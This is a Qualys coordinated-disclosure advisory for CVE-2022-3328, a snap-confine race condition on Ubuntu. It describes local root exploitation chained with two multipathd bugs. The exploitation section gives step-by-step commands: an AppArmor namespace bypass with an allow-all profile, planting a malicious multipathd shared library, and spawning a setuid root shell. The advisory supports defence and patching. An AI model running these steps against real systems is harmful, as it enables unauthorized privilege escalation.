Qualys Security Advisory
Race condition in snap-confine's must_mkdir_and_open_with_perms()
(CVE-2022-3328)
========================================================================
Contents
========================================================================
Summary
Background
Exploitation
Acknowledgments
Timeline
I can't help but feel a missed opportunity to integrate lyrics from
one of the best songs ever: [SNAP! - The Power (Official Video)]
-- https://twitter.com/spendergrsec/status/1494420041076461570
========================================================================
Summary
========================================================================
We discovered a race condition (CVE-2022-3328) in snap-confine, a
SUID-root program installed by default on Ubuntu. In this advisory, we
tell the story of this vulnerability (which was introduced in February
2022 by the patch for CVE-2021-44731) and detail how we exploited it in
Ubuntu Server (a local privilege escalation, from any user to root) by
combining it with two vulnerabilities in multipathd (an authorization
bypass and a symlink attack, CVE-2022-41974 and CVE-2022-41973):
https://www.qualys.com/2022/10/24/leeloo-multipath/leeloo-multipath.txt
========================================================================
Background
========================================================================
Like the crack of the whip, I Snap! attack
Radical mind, day and night all the time
-- SNAP! - The Power
In February 2022, we published CVE-2021-44731 in our "Lemmings" advisory
(https://www.qualys.com/2022/02/17/cve-2021-44731/oh-snap-more-lemmings.txt):
to set up a snap's sandbox, snap-confine created the temporary directory
/tmp/snap.$SNAP_NAME or reused it if it already existed, even if it did
not belong to root; a local attacker could race against snap-confine,
retain control over /tmp/snap.$SNAP_NAME, and eventually obtain full
root privileges.
This vulnerability was patched by commit acb2b4c ("cmd/snap-confine:
Prevent user-controlled race in setup_private_mount"), which introduced
a new helper function, must_mkdir_and_open_with_perms():
------------------------------------------------------------------------
142 static void setup_private_mount(const char *snap_name)
...
169 sc_must_snprintf(base_dir, sizeof(base_dir), "/tmp/snap.%s", snap_name);
...
176 base_dir_fd = must_mkdir_and_open_with_perms(base_dir, 0, 0, 0700);
------------------------------------------------------------------------
55 static int must_mkdir_and_open_with_perms(const char *dir, uid_t uid, gid_t gid,
56 mode_t mode)
..
61 mkdir:
..
67 if (mkdir(dir, 0700) < 0 && errno != EEXIST) {
..
70 fd = open(dir, O_RDONLY | O_DIRECTORY | O_CLOEXEC | O_NOFOLLOW);
..
81 if (fstat(fd, &st) < 0) {
..
84 if (st.st_uid != uid || st.st_gid != gid
85 || st.st_mode != (S_IFDIR | mode)) {
...
130 if (rename(dir, random_dir) < 0) {
...
135 goto mkdir;
------------------------------------------------------------------------
- the temporary directory /tmp/snap.$SNAP_NAME is created at line 67, if
it does not exist already;
- if it already exists, and if it does not belong to root (at line 84),
then it is moved out of the way (at line 130) by rename()ing it to a
random directory in /tmp, and its creation is retried (at line 135).
When we reviewed this patch back in December 2021, we felt very nervous
about this rename() call (because it allows a local attacker to rename()
a directory they do not own), and we advised the Ubuntu Security Team to
either not reuse the directory /tmp/snap.$SNAP_NAME at all, or to create
it in a non-world-writable directory instead of /tmp, or at least to use
renameat2(RENAME_EXCHANGE) instead of rename(). Unfortunately, all of
these ideas were deemed impractical (for example, renameat2() is not
supported by older kernel and glibc versions); moreover, we (Qualys)
failed to come up with a feasible attack plan against this rename()
call, so the patch was kept in its current form.
After the release of Ubuntu 22.04 in April 2022, we decided to revisit
snap-confine and its recent hardening changes, and we finally found a
way to exploit the rename() call in must_mkdir_and_open_with_perms().
========================================================================
Exploitation
========================================================================
It's getting, it's getting, it's getting kinda heavy
It's getting, it's getting, it's getting kinda hectic
-- SNAP! - The Power
The three key ideas to exploit the rename() of /tmp/snap.$SNAP_NAME are:
1/ snap-confine operates in /tmp to create a snap's temporary directory
(/tmp/snap.$SNAP_NAME in setup_private_mount()), but it also operates in
/tmp to create the snap's *root* directory (/tmp/snap.rootfs_XXXXXX in
sc_bootstrap_mount_namespace(), where all of the Xs are randomized by
mkdtemp()), and the string rootfs_XXXXXX is accepted as a valid snap
instance name by sc_instance_name_validate() (when all of the Xs are
lowercase alphanumeric):
------------------------------------------------------------------------
286 static void sc_bootstrap_mount_namespace(const struct sc_mount_config *config)
...
288 char scratch_dir[] = "/tmp/snap.rootfs_XXXXXX";
...
291 if (mkdtemp(scratch_dir) == NULL) {
...
303 sc_do_mount(scratch_dir, scratch_dir, NULL, MS_BIND, NULL);
...
319 sc_do_mount(config->rootfs_dir, scratch_dir, NULL, MS_REC | MS_BIND,
...
331 for (const struct sc_mount * mnt = config->mounts; mnt->path != NULL;
...
342 sc_must_snprintf(dst, sizeof dst, "%s/%s", scratch_dir,
343 mnt->path);
...
352 sc_do_mount(mnt->path, dst, NULL, MS_REC | MS_BIND,
------------------------------------------------------------------------
2/ We therefore execute two instances of snap-confine in parallel:
- we block the first snap-confine immediately after it creates its root
directory /tmp/snap.rootfs_XXXXXX at line 291 (we reliably win this
race condition by "single-stepping" snap-confine, as explained in our
"Lemmings" advisory);
- we execute the second snap-confine with a snap instance name of
rootfs_XXXXXX -- i.e., the temporary directory /tmp/snap.$SNAP_NAME of
this second snap-confine is the root directory /tmp/snap.rootfs_XXXXXX
of the first snap-confine;
- we kill this second snap-confine immediately after it rename()s its
temporary directory /tmp/snap.$SNAP_NAME -- i.e., the root directory
/tmp/snap.rootfs_XXXXXX of the first snap-confine -- at line 130 (we
reliably win this race condition with inotify, as explained in our
"Lemmings" advisory);
- we re-create the directory /tmp/snap.rootfs_XXXXXX ourselves, and
resume the execution of the first snap-confine, whose root directory
now belongs to us.
3/ We can therefore create an arbitrary symlink
/tmp/snap.rootfs_XXXXXX/tmp, and sc_bootstrap_mount_namespace() will
bind-mount the real /tmp directory (which is world-writable) onto any
directory in the filesystem (because mount() will follow our arbitrary
symlink at line 352).
This ability will eventually allow us to obtain full root privileges,
but we must first solve three problems:
------------------------------------------------------------------------
Problem a/ We cannot trick snap-confine into rename()ing
/tmp/snap.rootfs_XXXXXX, because this directory belongs to root and
must_mkdir_and_open_with_perms() rename()s it only if it does not belong
to root!
This problem solves itself naturally: indeed, /tmp/snap.rootfs_XXXXXX
belongs to the user root, but it belongs to the group of our own user,
so must_mkdir_and_open_with_perms() rename()s it because it does not
belong to the group root (at line 84).
------------------------------------------------------------------------
Problem b/ We cannot trick snap-confine into following our symlink
/tmp/snap.rootfs_XXXXXX/tmp, because sc_bootstrap_mount_namespace()
bind-mounts a read-only squashfs onto /tmp/snap.rootfs_XXXXXX (at line
319): if we create our symlink before this bind-mount, then it becomes
covered by the squashfs; and we cannot create our symlink after this
bind-mount, because the squashfs is read-only and belongs to root!
The "Prologue: CVE-2021-3996 and CVE-2021-3995 in util-linux's libmount"
of our "Lemmings" advisory suggests a solution to this problem: we must
unmount /tmp/snap.rootfs_XXXXXX each time sc_bootstrap_mount_namespace()
bind-mounts it (at lines 303 and 319). The "(deleted)" technique we used
in "Lemmings" (CVE-2021-3996 in util-linux) was patched in January 2022,
but we found a surprisingly simple workaround:
we mount a FUSE filesystem onto /tmp/snap.rootfs_XXXXXX, immediately
after we re-create this directory ourselves; this allows us to unmount
(with fusermount -u -z) any subsequent bind-mounts (even if they belong
to root), because fusermount does not check that our FUSE filesystem is
indeed the most recently mounted filesystem on /tmp/snap.rootfs_XXXXXX.
------------------------------------------------------------------------
Problem c/ We cannot trick snap-confine into bind-mounting the real /tmp
onto an arbitrary directory in the filesystem (at line 352), because
such a bind-mount is forbidden by snap-confine's AppArmor profile!
To solve this problem, we must bypass AppArmor completely, but the
technique we used in our "Lemmings" advisory (we wrapped snap-confine's
execution in an AppArmor profile that was in "complain" mode, not in
"enforce" mode) was patched in February 2022 (by commits 26eed65 and
4a2eb78, "ensure that snap-confine is in strict confinement" and
"Tighten AppArmor label check"):
now, snap-confine's execution must be wrapped in an AppArmor profile
that is in "enforce" mode and whose label matches the regular expression
"^(/snap/(snapd|core)/x?[0-9]+/usr/lib|/usr/lib(exec)?)/snapd/snap-confine$".
We were about to give up on trying to exploit snap-confine, when we
discovered CVE-2022-41974 and CVE-2022-41973 in multipathd (which is
installed by default on Ubuntu Server): these two vulnerabilities allow
us to create a directory named "failed_wwids" (user root, group root,
mode 0700) anywhere in the filesystem, and we were able to transform
this very limited directory creation into a complete AppArmor bypass.
AppArmor supports policy namespaces that are loosely related to kernel
user namespaces; by default, no AppArmor namespaces exist:
------------------------------------------------------------------------
$ ls -la /sys/kernel/security/apparmor/policy/namespaces
total 0
drwxr-xr-x 2 root root 0 Aug 6 12:42 .
drwxr-xr-x 5 root root 0 Aug 6 12:42 ..
------------------------------------------------------------------------
However, we (attackers) can create an AppArmor namespace "failed_wwids"
by exploiting CVE-2022-41974 and CVE-2022-41973 in multipathd:
------------------------------------------------------------------------
$ ln -s /sys/kernel/security/apparmor/policy/namespaces /dev/shm/multipath
$ multipathd list devices | grep 'whitelisted, unmonitored'
sda1 devnode whitelisted, unmonitored
...
$ multipathd list list path sda1
fail
$ ls -la /sys/kernel/security/apparmor/policy/namespaces
total 0
drwxr-xr-x 3 root root 0 Aug 6 12:42 .
drwxr-xr-x 5 root root 0 Aug 6 12:42 ..
drwx------ 5 root root 0 Aug 6 13:38 failed_wwids
------------------------------------------------------------------------
Then, we can enter this AppArmor namespace by creating and entering an
unprivileged user namespace:
------------------------------------------------------------------------
$ aa-exec -n failed_wwids -p unconfined -- unshare -U -r /bin/sh
------------------------------------------------------------------------
Inside this namespace, we can create an AppArmor profile labeled
"/usr/lib/snapd/snap-confine" that is in "enforce" mode and allows all
possible operations:
------------------------------------------------------------------------
# apparmor_parser -K -a << "EOF"
/usr/lib/snapd/snap-confine (enforce) {
capability,
network,
mount,
remount,
umount,
pivot_root,
ptrace,
signal,
dbus,
unix,
file,
change_profile,
}
EOF
------------------------------------------------------------------------
Back in the initial namespace, we check that our "allow all" AppArmor
profile still exists:
------------------------------------------------------------------------
# aa-status
apparmor module is loaded.
32 profiles are loaded.
32 profiles are in enforce mode.
...
:failed_wwids:/usr/lib/snapd/snap-confine
------------------------------------------------------------------------
Last, we make sure that snap-confine accepts our "allow all" AppArmor
profile (i.e., AppArmor is bypassed, and snap-confine is effectively
unconfined):
------------------------------------------------------------------------
$ env -i SNAPD_DEBUG=1 SNAP_INSTANCE_NAME=lxd aa-exec -n failed_wwids -p /usr/lib/snapd/snap-confine -- /usr/lib/snapd/snap-confine --base lxd snap.lxd.daemon /nonexistent
...
DEBUG: apparmor label on snap-confine is: /usr/lib/snapd/snap-confine
DEBUG: apparmor mode is: enforce
------------------------------------------------------------------------
We can therefore bind-mount /tmp onto an arbitrary directory in the
filesystem (by exploiting CVE-2022-3328); since we already depend on
multipathd to bypass AppArmor, we bind-mount /tmp onto /lib/multipath,
create our own shared library /lib/multipath/libchecktur.so, shutdown
multipathd (by exploiting CVE-2022-41974), restart multipathd (through
its Unix socket), and finally obtain full root privileges (because
multipathd executes our shared library as root when it restarts):
------------------------------------------------------------------------
$ grep multipath /proc/self/mountinfo | wc
0 0 0
$ gcc -o CVE-2022-3328 CVE-2022-3328.c
$ ./CVE-2022-3328
scratch directory for constructing namespace: /tmp/snap.rootfs_0j4u9c
$ grep multipath /proc/self/mountinfo
1395 29 253:0 /tmp /usr/lib/multipath rw,relatime shared:1 - ext4 /dev/mapper/ubuntu--vg-ubuntu--lv rw
...
$ gcc -fpic -shared -o /lib/multipath/libchecktur.so libtmpsh.c
$ ps -ef | grep 'multipath[d]'
root 371 1 0 12:42 ? 00:00:00 /sbin/multipathd -d -s
$ multipathd list list add del switch sus resu rei fai resi rese rel forc dis rest paths maps path P map P gro P rec dae statu stats top con bla dev raw wil quit
ok
$ ps -ef | grep 'multipath[d]' | wc
0 0 0
$ ls -l /tmp/sh
ls: cannot access '/tmp/sh': No such file or directory
$ multipathd list daemon
error -104 receiving packet
$ ls -l /tmp/sh
-rwsr-xr-x 1 root root 125688 Aug 6 14:55 /tmp/sh
$ /tmp/sh -p
# id
uid=65534(nobody) gid=65534(nogroup) euid=0(root) groups=65534(nogroup)
^^^^^^^^^^^^
------------------------------------------------------------------------
========================================================================
Acknowledgments
========================================================================
We thank the Ubuntu security team (Alex Murray and Seth Arnold in
particular) and the snapd team for their hard work on this snap-confine
vulnerability. We also thank the members of linux-distros@openwall.
========================================================================
Timeline
========================================================================
2022-08-23: Contacted security@ubuntu.
2022-11-28: Contacted linux-distros@openwall.
2022-11-30: Coordinated Release Date (17:00 UTC).